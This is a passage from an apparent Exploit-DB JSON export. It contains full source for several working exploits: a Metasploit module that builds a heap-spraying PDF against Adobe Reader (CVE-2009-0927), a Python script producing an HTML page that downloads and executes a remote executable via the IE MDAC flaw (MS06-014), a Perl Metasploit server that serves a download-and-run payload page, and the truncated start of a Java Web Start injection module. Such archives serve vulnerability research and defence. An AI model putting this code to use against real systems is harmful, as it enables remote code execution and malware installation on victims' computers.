the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Collab.getIcon() Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\r\n\t\t\t\tAffected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\r\n\t\t\t\tcrafted pdf that a contains malformed Collab.getIcon() call, an attacker may\r\n\t\t\t\tbe able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'MC',\r\n\t\t\t\t\t'Didier Stevens <didier.stevens[at]gmail.com>',\r\n\t\t\t\t\t'jduck'\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10477 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-0927' ],\r\n\t\t\t\t\t[ 'OSVDB', '53647' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-014/' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# test results (on Windows XP SP3)\r\n\t\t\t\t\t# reader 7.0.5 - no trigger\r\n\t\t\t\t\t# reader 7.0.8 - no trigger\r\n\t\t\t\t\t# reader 7.0.9 - no trigger\r\n\t\t\t\t\t# reader 7.1.0 - no trigger\r\n\t\t\t\t\t# reader 7.1.1 - reported not vulnerable\r\n\t\t\t\t\t# reader 8.0.0 - works\r\n\t\t\t\t\t# reader 8.1.2 - works\r\n\t\t\t\t\t# reader 8.1.3 - reported not vulnerable\r\n\t\t\t\t\t# reader 9.0.0 - works\r\n\t\t\t\t\t# reader 9.1.0 - reported not vulnerable\r\n\t\t\t\t\t[ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Mar 24 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Make some nops\r\n\t\tnops = Rex::Text.to_unescape(make_nops(4))\r\n\r\n\t\t# Randomize variables\r\n\t\trand1 = rand_text_alpha(rand(100) + 1)\r\n\t\trand2 = rand_text_alpha(rand(100) + 1)\r\n\t\trand3 = rand_text_alpha(rand(100) + 1)\r\n\t\trand4 = rand_text_alpha(rand(100) + 1)\r\n\t\trand5 = rand_text_alpha(rand(100) + 1)\r\n\t\trand6 = rand_text_alpha(rand(100) + 1)\r\n\t\trand7 = rand_text_alpha(rand(100) + 1)\r\n\t\trand8 = rand_text_alpha(rand(100) + 1)\r\n\t\trand9 = rand_text_alpha(rand(100) + 1)\r\n\t\trand10 = rand_text_alpha(rand(100) + 1)\r\n\t\trand11 = rand_text_alpha(rand(100) + 1)\r\n\t\trand12 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tscript = %Q|\r\n\t\tvar #{rand1} = unescape(\"#{shellcode}\");\r\n\t\tvar #{rand2} =\"\";\r\n\t\tfor (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(\"#{nops}\");\r\n\t\t#{rand4} = #{rand2} + #{rand1};\r\n\t\t#{rand5} = unescape(\"#{nops}\");\r\n\t\t#{rand6} = 20;\r\n\t\t#{rand7} = #{rand6}+#{rand4}.length\r\n\t\twhile (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};\r\n\t\t#{rand8} = #{rand5}.substring(0, #{rand7});\r\n\t\t#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});\r\n\t\twhile(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};\r\n\t\t#{rand10} = new Array();\r\n\t\tfor (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};\r\n\t\tvar #{rand12} = unescape(\"%0a\");\r\n\t\twhile(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};\r\n\t\t#{rand12} = \"N.\"+#{rand12};\r\n\t\tCollab.getIcon(#{rand12});\r\n\t\t\t\t\t|\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(script)\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file...\")\r\n\r\n\t\tfile_create(pdf)\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % id\r\n\tend\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\tdef make_pdf(js)\r\n\r\n\t\txref = []\r\n\t\teol = \"\\x0d\\x0a\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\tpdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu(\"<</Type/Catalog/Outlines \") << ioRef(2) << nObfu(\"/Pages \") << ioRef(3) << nObfu(\"/OpenAction \") << ioRef(5) << \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(2) << nObfu(\"<</Type/Outlines/Count 0>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu(\"<</Type/Pages/Kids[\") << ioRef(4) << nObfu(\"]/Count 1>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) << nObfu(\"/MediaBox[0 0 612 792]>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\t\tpdf << \"trailer\" << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\t\tpdf << \"%%EOF\" << eol\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16681/"}, {"lastseen": "2016-01-31T15:25:39", "description": "MS Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014). CVE-2006-0003. Remote exploit for windows platform", "published": "2006-07-21T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer - MDAC Remote Code Execution Exploit MS06-014", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0003"], "modified": "2006-07-21T00:00:00", "id": "EDB-ID:2052", "href": "https://www.exploit-db.com/exploits/2052/", "sourceData": "#!/bin/sh -\r\n\"exec\" \"python\" \"-O\" \"$0\" \"$@\"\r\n\r\n__doc__ = \"\"\"[BL4CK] - MS06-014\r\n\r\nRDS.DataStore - Data Execution\r\nCVS-2006-0003\r\nMS06-014\r\n\r\nApril 2006\r\n\r\n*** this is a bit out-dated, but works very well ***\r\n\r\nUsage: ./bl4ck_ms06_014.py http://omfg.what.ho.st/~user/stage2.exe index.html\r\n\r\nNow upload index.html to the same webserver hosting your\r\nhttp://omfg.what.ho.st/~user/stage2.exe \r\n\r\n - redsand@blacksecurity.org\r\n\"\"\"\r\n\r\n__version__ = \"1.0\"\r\n\r\nimport sys, random\r\n\r\nclass MS06014:\r\n \r\n __version = \"'[BL4CK] MS06-014 \" + __version__ + \"\\r\\n\"\r\n\r\n\r\n __html = \"\"\"\r\n <title></title>\r\n <head></head>\r\n\r\n <body>\r\n\r\n <script language=\"VBScript\">\r\n\r\n on error resume next\r\n\r\n BL4CK_PAYLOAD\r\n\r\n </script>\r\n <head>\r\n <title>[BL4CK] || 404 Not Found</title>\r\n </head><body>\r\n <h1>Not Found</h1>\r\n pwn3d!!\r\n <hr>\r\n <!-- <script>location.href='http://google.com'</script> -->\r\n </body>\r\n\r\n </html>\r\n\r\n \"\"\"\r\n\r\n __payload = \"\"\"\r\n\r\n ' due to how ajax works, the file MUST be within the same local domain\r\n dl = \"URLFILE\"\r\n\r\n ' create adodbstream object\r\n Set df = document.createElement(\"object\")\r\n df.setAttribute \"classid\", \"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\"\r\n str=\"Microsoft.XMLHTTP\"\r\n Set x = df.CreateObject(str,\"\")\r\n\r\n a1=\"Ado\"\r\n a2=\"db.\"\r\n a3=\"Str\"\r\n a4=\"eam\"\r\n str1=a1&a2&a3&a4\r\n str5=str1\r\n set S = df.createobject(str5,\"\")\r\n S.type = 1\r\n\r\n ' xml ajax req\r\n str6=\"GET\"\r\n x.Open str6, dl, False\r\n x.Send\r\n\r\n ' Get temp directory and create our destination name\r\n fname1=\"bl4ck.com\"\r\n set F = df.createobject(\"Scripting.FileSystemObject\",\"\")\r\n set tmp = F.GetSpecialFolder(2) ' Get tmp folder\r\n fname1= F.BuildPath(tmp,fname1)\r\n S.open\r\n ' open adodb stream and write contents of request to file\r\n ' like vbs dl+exec code\r\n S.write x.responseBody\r\n ' Saves it with CreateOverwrite flag\r\n S.savetofile fname1,2\r\n\r\n S.close\r\n set Q = df.createobject(\"Shell.Application\",\"\")\r\n Q.ShellExecute fname1,\"\",\"\",\"open\",0\r\n\r\n \"\"\"\r\n\r\n def\t__init__(self, file):\r\n\r\n\tself.__file = file\r\n\r\n\r\n\r\n def bl4ck(self):\r\n\tself.__payload = self.__payload.replace(\"URLFILE\",self.__file)\r\n\r\n\tencoded = self.__payload\r\n\r\n\tret = self.__html.replace(\"BL4CK_PAYLOAD\",encoded)\r\n\r\n\treturn ret\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n\turl=False\r\n\tout=False\r\n\r\n\tprint \"[BL4CK] MS06-014 - redsand@blacksecurity.org\"\r\n\tprint \"url path to file must be on the same domain as the htm file\"\r\n\tprint \"http://blacksecurity.org\\r\\n\"\r\n\r\n\r\n\targc = len(sys.argv)\r\n\tif(argc <= 2):\r\n \tprint \"USAGE: %s <download url> <outfile>\" % sys.argv[0]\r\n \tsys.exit(0)\r\n\tif(argc > 1):\r\n \t\turl = sys.argv[1]\r\n\tif(argc > 2):\r\n \tout = sys.argv[2]\r\n\r\n ms = MS06014(url)\r\n\r\n \tret = ms.bl4ck()\r\n\r\n\r\n\ttry:\r\n\t fsock = open(out, \"w+\", 0)\r\n\t try:\r\n\t fsock.write(ret );\r\n\t finally:\r\n\t fsock.close()\r\n\texcept IOError:\r\n\t pass\r\n\r\n\tprint \"Wrote %r bytes to: %s\" % (len(ret),out)\r\n\r\n# milw0rm.com [2006-07-21]\r\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2052/"}, {"lastseen": "2016-01-31T15:39:45", "description": "Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) (2). CVE-2006-0003. Remote exploit for windows platform", "published": "2006-08-10T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer - MDAC Remote Code Execution Exploit MS06-014 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0003"], "modified": "2006-08-10T00:00:00", "id": "EDB-ID:2164", "href": "https://www.exploit-db.com/exploits/2164/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be redistributed\r\n# according to the licenses defined in the Authors field below. In the\r\n# case of an unknown or missing license, this file defaults to the same\r\n# license as the core Framework (dual GPLv2 and Artistic). The latest\r\n# version of the Framework can always be obtained from metasploit.com.\r\n##\r\n\r\npackage Msf::Exploit::ie_createobject;\r\n\r\nuse strict;\r\nuse base \"Msf::Exploit\";\r\nuse Pex::Text;\r\nuse IO::Socket::INET;\r\nuse IPC::Open3;\r\n\r\nmy $advanced =\r\n {\r\n\t'Gzip' => [1, 'Enable gzip content encoding'],\r\n\t'Chunked' => [1, 'Enable chunked transfer encoding'],\r\n };\r\n\r\nmy $info =\r\n {\r\n\t'Name' => 'Internet Explorer COM CreateObject Code Execution',\r\n\t'Version' => '$Revision: 3753 $',\r\n\t'Authors' =>\r\n\t [\r\n\t\t'H D Moore <hdm [at] metasploit.com>',\r\n\t ],\r\n\r\n\t'Description' =>\r\n\t Pex::Text::Freeform(qq{\r\n\t\tThis module exploits a generic code execution vulnerability in Internet \r\n\t\tExplorer by abusing vulnerable ActiveX objects. \r\n}),\r\n\r\n\t'Arch' => [ 'x86' ],\r\n\t'OS' => [ 'win32', 'winxp', 'win2003' ],\r\n\t'Priv' => 0,\r\n\r\n\t'UserOpts' =>\r\n\t {\r\n\t\t'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],\r\n\t\t'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', \"0.0.0.0\" ],\r\n\t },\r\n\r\n\t'Payload' =>\r\n\t {\r\n\t\t'Space' => 4000,\r\n\t\t'Keys' => ['-bind'],\r\n\t },\r\n\t'Refs' =>\r\n\t [\r\n\t\t['MSB', 'MS06-014']\r\n\t ],\r\n\r\n\t'DefaultTarget' => 0,\r\n\t'Targets' =>\r\n\t [\r\n\t \t[ 'Automatic' ],\r\n\r\n\t\t# Patched\r\n\t\t[ 'MS06-014 - RDS.DataControl', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'],\r\n\r\n\t\t# Not marked as safe\r\n\t\t[ 'UNKNOWN - RDS.DataSpace', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'],\r\n\r\n\t\t# Not marked as safe\r\n\t\t[ 'UNKNOWN - Business Object Factory ', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'],\r\n\t\t\r\n\t\t# Not marked as safe\r\n\t\t[ 'UNKNOWN - Outlook Data Object', '{0006F033-0000-0000-C000-000000000046}'],\r\n\r\n\t\t# Found exploitable in the wild (no details)\r\n\t\t[ 'UNKNOWN - Outlook.Application', '{0006F03A-0000-0000-C000-000000000046}'],\r\n\r\n\t\t# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)\r\n\t\t[ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'],\r\n\t\t[ 'UNKNOWN - SoftwareDistribution.WebControl.1', '{6414512B-B978-451D-A0D8-FCFDF33E833C}'],\r\n\r\n\t\t# Part of the WMI SDK, currently unpatched/unreported\r\n\t\t[ 'UNKNOWN - WMIScriptUtils.WMIObjectBroker2.1', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'],\r\n\t\t\r\n\t\t# Visual Studio components, not marked as safe\r\n\t\t[ 'UNKNOWN - VsmIDE.DTE', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'],\r\n\t\t[ 'UNKNOWN - DExplore.AppObj.8.0', '{639F725F-1B2D-4831-A9FD-874847682010}'],\r\n\t\t[ 'UNKNOWN - VisualStudio.DTE.8.0', '{BA018599-1DB3-44f9-83B4-461454C84BF8}'],\r\n\t\t[ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'],\r\n\t\t[ 'UNKNOWN - VsaIDE.DTE', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'],\t\t\t\r\n\t ],\r\n\r\n\t'Keys' => [ 'ie' ],\r\n\r\n\t'DisclosureDate' => '',\r\n };\r\n\r\nsub new {\r\n\tmy $class = shift;\r\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\r\n\treturn($self);\r\n}\r\n\r\nsub Exploit\r\n{\r\n\tmy $self = shift;\r\n\r\n\tmy $server = IO::Socket::INET->new(\r\n\t\tLocalHost => $self->GetVar('HTTPHOST'),\r\n\t\tLocalPort => $self->GetVar('HTTPPORT'),\r\n\t\tReuseAddr => 1,\r\n\t\tListen => 1,\r\n\t\tProto => 'tcp'\r\n\t );\r\n\tmy $client;\r\n\r\n\t# Did the listener create fail?\r\n\tif (not defined($server)) {\r\n\t\t$self->PrintLine(\"[-] Failed to create local HTTP listener on \" . $self->GetVar('HTTPPORT'));\r\n\t\treturn;\r\n\t}\r\n\r\n\tmy $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?\r\n\t Pex::Utils::SourceIP('1.2.3.4') :\r\n\t $self->GetVar('HTTPHOST');\r\n\r\n\t$self->PrintLine(\"[*] Waiting for connections to http://\". $httphost .\":\". $self->GetVar('HTTPPORT') .\"/\");\r\n\r\n\twhile (defined($client = $server->accept())) {\r\n\t\t$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));\r\n\t}\r\n\r\n\treturn;\r\n}\r\n\r\nsub HandleHttpClient\r\n{\r\n\tmy $self = shift;\r\n\tmy $fd = shift;\r\n\tmy $shellcode = my $shellcode = $self->GetVar('EncodedPayload')->Payload;\r\n\t \r\n\t# Set the remote host information\r\n\tmy ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);\r\n\r\n\t# Read the HTTP command\r\n\tmy ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);\r\n\r\n\t# Read the HTTP headers\r\n\tmy $headers;\r\n\twhile ( (my $line = $fd->RecvLine(10))) {\r\n\t\t$headers .= $line;\r\n\t\tlast if $line eq \"\\r\\n\";\r\n\t}\r\n\r\n\tif ($url =~ /\\?payload/) {\r\n\t\t$self->PrintLine(\"[*] HTTP Client $rhost:$rport asked for payload...\");\r\n\t\tmy $content = Pex::Utils::CreateWin32PE($shellcode, 'ie_createobject');\r\n\t\t$fd->Send($self->BuildResponse($content, 'application/octet-stream'));\r\n\t\t$fd->Close;\r\n\t\treturn;\r\n\t}\r\n\t$self->PrintLine(\"[*] HTTP Client $rhost:$rport asked for exploit page...\");\r\n\t$fd->Send($self->BuildResponse($self->GenerateHTML(), 'text/html'));\r\n\t$fd->Close;\r\n\treturn;\r\n}\r\n\r\nsub GenerateHTML {\r\n\tmy $self = shift;\r\n\tmy $target_idx = $self->GetVar('TARGET');\r\n\tmy $objects = \"\";\r\n\t\r\n\tif ($target_idx == 0) {\r\n\t\tforeach my $target (@{ $self->Targets }) {\r\n\t\t\tif ($target->[1]) {\r\n\t\t\t\t$objects .= \"'\".$target->[1].\"',\";\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\tmy $target = $self->Targets->[$target_idx];\r\n\t\t$objects .= \"'\".$target->[1].\"',\";\r\n\t}\r\n\r\n\tmy $data = \r\nqq#\r\n<html><head><title></title>\r\n<script language=\"javascript\">\r\n\r\nfunction Log(m) {\r\n\tvar log = document.createElement('p');\r\n\tlog.innerHTML = m;\r\n\tdocument.body.appendChild(log);\r\n\t\r\n}\r\n\r\nfunction CreateO(o, n) {\r\n\tvar r = null;\r\n\t\r\n\ttry { eval('r = o.CreateObject(n)') }catch(e){}\r\n\t\r\n\tif (! r) {\r\n\t\ttry { eval('r = o.CreateObject(n, \"\")') }catch(e){}\r\n\t}\r\n\t\r\n\tif (! r) {\r\n\t\ttry { eval('r = o.CreateObject(n, \"\", \"\")') }catch(e){}\r\n\t}\r\n\r\n\tif (! r) {\r\n\t\ttry { eval('r = o.GetObject(\"\", n)') }catch(e){}\r\n\t}\r\n\t\r\n\tif (! r) {\r\n\t\ttry { eval('r = o.GetObject(n, \"\")') }catch(e){}\r\n\t}\r\n\t\r\n\tif (! r) {\r\n\t\ttry { eval('r = o.GetObject(n)') }catch(e){}\r\n\t}\r\n\t\r\n\treturn(r);\t\r\n}\r\n\r\nfunction Go(a) {\r\n\tLog('Creating helper objects...');\r\n\tvar s = CreateO(a, \"WScript.Shell\");\r\n\tvar o = CreateO(a, \"ADODB.Stream\");\r\n\tvar e = s.Environment(\"Process\");\r\n\t\r\n\tLog('Ceating the XMLHTTP object...');\r\n\tvar url = document.location + '?payload';\r\n\tvar xml = null;\r\n\tvar bin = e.Item(\"TEMP\") + \"metasploit.exe\";\r\n\tvar dat; \r\n\t\r\n\ttry { xml=new XMLHttpRequest(); }\r\n\tcatch(e) {\r\n\t\ttry { xml = new ActiveXObject(\"Microsoft.XMLHTTP\"); }\r\n\t\tcatch(e) {\r\n\t\t\txml = new ActiveXObject(\"MSXML2.ServerXMLHTTP\");\r\n\t\t}\r\n\t}\r\n\t\r\n\tif (! xml) return(0);\r\n\r\n\tLog('Downloading the payload...');\t\r\n\txml.open(\"GET\", url, false)\r\n\txml.send(null);\r\n\tdat = xml.responseBody;\r\n\r\n\tLog('Writing the payload to disk...');\t\r\n\to.Type = 1;\r\n\to.Mode = 3;\r\n\to.Open();\r\n\to.Write(dat);\r\n\to.SaveToFile(bin, 2);\r\n\r\n\tLog('Executing the payload...');\t\t\r\n\ts.Run(bin,0);\r\n}\r\n\r\nfunction Exploit() {\r\n\tvar i = 0;\r\n\tvar t = new Array(${objects}null);\r\n\t\r\n\twhile (t[i]) {\r\n\t\tvar a = null;\r\n\t\t\r\n\t\tif (t[i].substring(0,1) == '{') {\r\n\t\t\ta = document.createElement(\"object\");\r\n\t\t\ta.setAttribute(\"classid\", \"clsid:\" + t[i].substring(1, t[i].length - 1));\r\n\t\t} else {\r\n\t\t\ttry { a = new ActiveXObject(t[i]); } catch(e){}\r\n\t\t}\r\n\t\t\r\n\t\tif (a) {\r\n\t\t\ttry {\t\t\r\n\t\t\t\tvar b = CreateO(a, \"WScript.Shell\");\r\n\t\t\t\tif (b) {\r\n\t\t\t\t\tLog('Loaded ' + t[i]);\r\n\t\t\t\t\tGo(a);\r\n\t\t\t\t\treturn(0);\r\n\t\t\t\t}\r\n\t\t\t} catch(e){}\r\n\t\t}\r\n\t\ti++;\r\n\t}\r\n\tLog('Exploit failed.');\r\n}\r\n</script>\r\n</head>\r\n<body onload='Exploit()'>\r\n<p>Initializing...</p>\r\n</body>\r\n</html>\r\n#;\r\n}\r\n\r\nsub BuildResponse {\r\n\tmy ($self, $content, $type) = @_;\r\n\t$type ||= 'text/plain';\r\n\r\n\tmy $response =\r\n\t \"HTTP/1.1 200 OK\\r\\n\" .\r\n\t \"Content-Type: $type\\r\\n\";\r\n\r\n\tif ($self->GetVar('Gzip')) {\r\n\t\t$response .= \"Content-Encoding: gzip\\r\\n\";\r\n\t\t$content = $self->Gzip($content);\r\n\t}\r\n\tif ($self->GetVar('Chunked')) {\r\n\t\t$response .= \"Transfer-Encoding: chunked\\r\\n\";\r\n\t\t$content = $self->Chunk($content);\r\n\t} else {\r\n\t\t$response .= 'Content-Length: ' . length($content) . \"\\r\\n\" .\r\n\t\t \"Connection: close\\r\\n\";\r\n\t}\r\n\r\n\t$response .= \"\\r\\n\" . $content;\r\n\r\n\treturn $response;\r\n}\r\n\r\nsub Chunk {\r\n\tmy ($self, $content) = @_;\r\n\r\n\tmy $chunked;\r\n\twhile (length($content)) {\r\n\t\tmy $chunk = substr($content, 0, int(rand(10) + 1), '');\r\n\t\t$chunked .= sprintf('%x', length($chunk)) . \"\\r\\n$chunk\\r\\n\";\r\n\t}\r\n\t$chunked .= \"0\\r\\n\\r\\n\";\r\n\r\n\treturn $chunked;\r\n}\r\n\r\nsub Gzip {\r\n\tmy $self = shift;\r\n\tmy $data = shift;\r\n\tmy $comp = int(rand(5))+5;\r\n\r\n\tmy($wtr, $rdr, $err);\r\n\r\n\tmy $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');\r\n\tprint $wtr $data;\r\n\tclose ($wtr);\r\n\tlocal $/;\r\n\r\n\treturn (<$rdr>);\r\n}\r\n\r\n1;\r\n\r\n# milw0rm.com [2006-08-10]\r\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2164/"}, {"lastseen": "2017-03-23T13:17:02", "description": "Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit). CVE-2010-0886,CVE-2010-1423. Local exploit for Windows platform", "published": "2010-04-09T00:00:00", "type": "exploitdb", "title": "Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0886", "CVE-2010-1423"], "modified": "2010-04-09T00:00:00", "id": "EDB-ID:41700", "href": "https://www.exploit-db.com/exploits/41700/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n #\r\n # This module acts as an HTTP server\r\n #\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Sun Java Web Start Plugin Command Line Argument Injection',\r\n 'Description' => %q{\r\n This module exploits a flaw in the Web Start plugin component of Sun Java\r\n Web Start. The arguments passed to Java Web Start are not properly validated.\r\n By passing the lesser known -J option, an attacker can pass arbitrary options\r\n directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed\r\n by Ruben Santamarta, an attacker can execute arbitrary code in the context of\r\n an unsuspecting browser user.\r\n This vulnerability was originally discovered independently by both Ruben\r\n Santamarta and Tavis Ormandy. Tavis reported that all versions since version\r\n 6 Update 10 \"are believed to be affected by this vulnerability.\"\r\n In order for this module to work, it must be ran as root on a server that\r\n does not serve SMB. Additionally, the target host must have the WebClient\r\n service (WebDAV Mini-Redirector) enabled.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => 'jduck',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2010-0886' ],\r\n [ 'CVE', '2010-1423' ],\r\n [ 'OSVDB', '63648' ],\r\n [ 'BID', '39346' ],\r\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html' ],\r\n [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => '',\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\"\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', { } ],\r\n [ 'Java Runtime on Windows x86',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Apr 09 2010'\r\n ))\r\n\r\n register_options(\r\n [\r\n OptPort.new('SRVPORT', [ true, \"The daemon port to listen on\", 80 ]),\r\n OptString.new('URIPATH', [ true, \"The URI to use.\", \"/\" ]),\r\n OptString.new('UNCPATH', [ false, 'Override the UNC 